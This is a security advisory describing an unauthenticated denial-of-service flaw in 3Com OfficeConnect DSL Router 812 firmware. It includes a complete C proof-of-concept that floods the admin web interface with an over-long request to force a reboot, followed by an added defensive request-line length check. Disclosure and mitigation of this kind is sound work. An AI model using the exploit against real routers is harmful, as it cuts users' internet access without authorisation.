3Com DSL Router Administrative Interface Long Request DoS

Summary

OfficeConnect is a router widely used around the world. A flaw in its web administration interface allows the router to be rebooted. Because no authentication is needed, any LAN user can cause a crash and reboot of the router, interrupting the internet connection for one or two minutes. A remote user can exploit the flaw if the web interface is available on the WAN interface of the router, or if he can persuade a user to click on a link in a forum or to visit a web page (the web interface is always reachable when the connection is initiated locally, as it is from the user's web browser).

Credit:

The information has been provided by Shaun Colley.


Details

Vulnerable Systems:
 * 3Com OfficeConnect DSL Router 812 1.1.7
 * 3Com OfficeConnect DSL Router 812 1.1.9
 * 3Com OfficeConnect DSL Router 812 2.0

Exploit:
/* 3com-DoS.c
 *
 * PoC DoS exploit for 3Com OfficeConnect DSL Routers.
 * discovered by David F. Madrid.
 *
 * Successful exploitation of the vulnerability should cause the router to
 * reboot. It is not believed that arbitrary code execution is possible -
 * check advisory for more information.
 *
 * -shaun2k2
 */
 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, memcpy, strlen */
#include <unistd.h>      /* sleep, close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
 if(argc < 3) {
  printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n");
  printf("Usage: 3comDoS <3com_router> <port>\n");
  exit(-1);
 }

 int sock;
 char explbuf[521];
 struct sockaddr_in dest;
 struct hostent *he;

 if((he = gethostbyname(argv[1])) == NULL) {
  printf("Couldn't resolve %s!\n", argv[1]);
  exit(-1);
 }

 if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  perror("socket()");
  exit(-1);
 }

 printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n");

 dest.sin_addr = *((struct in_addr *)he->h_addr);
 dest.sin_port = htons(atoi(argv[2]));
 dest.sin_family = AF_INET;

 printf("[+] Crafting exploit buffer.\n");
 /* 512 filler bytes followed by 8 newlines; NUL-terminated so strlen() below is defined */
 memset(explbuf, 'A', 512);
 memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);
 explbuf[520] = '\0';

 if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
  perror("connect()");
  exit(-1);
 }

 printf("[+] Connected...Sending exploit buffer!\n");
 send(sock, explbuf, strlen(explbuf), 0);
 sleep(2);
 close(sock);
 printf("\n[+] Exploit buffer sent!\n");
 return(0);
}
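
A defensive counterpart to the request shape the PoC sends, as an added example that is not part of the original advisory or of 3Com's firmware: a bounded request-line check that an embedded web server can run before parsing, so an over-long line is answered with 414 instead of being processed. The 256-byte limit, the method list and all names are assumptions; the advisory does not state the firmware's root cause.

```c
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST_LINE 256 /* assumed limit for this sketch, not a 3Com value */

enum verdict { REQ_INCOMPLETE = 0, REQ_OK = 200, REQ_MALFORMED = 400, REQ_TOO_LONG = 414 };

/* Length of a recognised method token plus its trailing space, or 0. */
static size_t method_len(const char *line, size_t n)
{
    static const char *methods[] = { "GET ", "HEAD ", "POST " };
    for (size_t i = 0; i < sizeof methods / sizeof methods[0]; i++) {
        size_t m = strlen(methods[i]);
        if (n > m && memcmp(line, methods[i], m) == 0)
            return m;
    }
    return 0;
}

/* Classify the request line in buf[0..len) without scanning past the limit.
 * Returns the HTTP status to answer with, or REQ_INCOMPLETE to keep reading. */
enum verdict check_request_line(const char *buf, size_t len)
{
    size_t scan = len < MAX_REQUEST_LINE ? len : MAX_REQUEST_LINE;
    const char *nl = memchr(buf, '\n', scan);
    if (nl == NULL) /* no line end yet: wait for more, or give up at the limit */
        return len >= MAX_REQUEST_LINE ? REQ_TOO_LONG : REQ_INCOMPLETE;
    size_t n = (size_t)(nl - buf);
    if (n > 0 && buf[n - 1] == '\r')
        n--;
    size_t m = method_len(buf, n);
    /* Expect "<method> <target> HTTP/1.x": non-empty target with no spaces. */
    if (m == 0 || n < m + 10)
        return REQ_MALFORMED;
    if (memchr(buf + m, ' ', n - m - 9) || buf[n - 9] != ' ' || memcmp(buf + n - 8, "HTTP/1.", 7))
        return REQ_MALFORMED;
    return REQ_OK;
}

int main(void)
{
    char probe[520]; /* constructed input: 512 filler bytes plus 8 newlines */
    memset(probe, 'A', 512);
    memset(probe + 512, '\n', 8);
    const char *ok = "GET /index.html HTTP/1.0\r\n\r\n"; /* constructed normal request */
    printf("long request   -> %d\n", check_request_line(probe, sizeof probe));
    printf("normal request -> %d\n", check_request_line(ok, strlen(ok)));
    return 0;
}
```

The same check works as a detection rule on a proxy or sensor in front of the admin interface: a first line that reaches the limit without a newline is worth logging with its source address.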
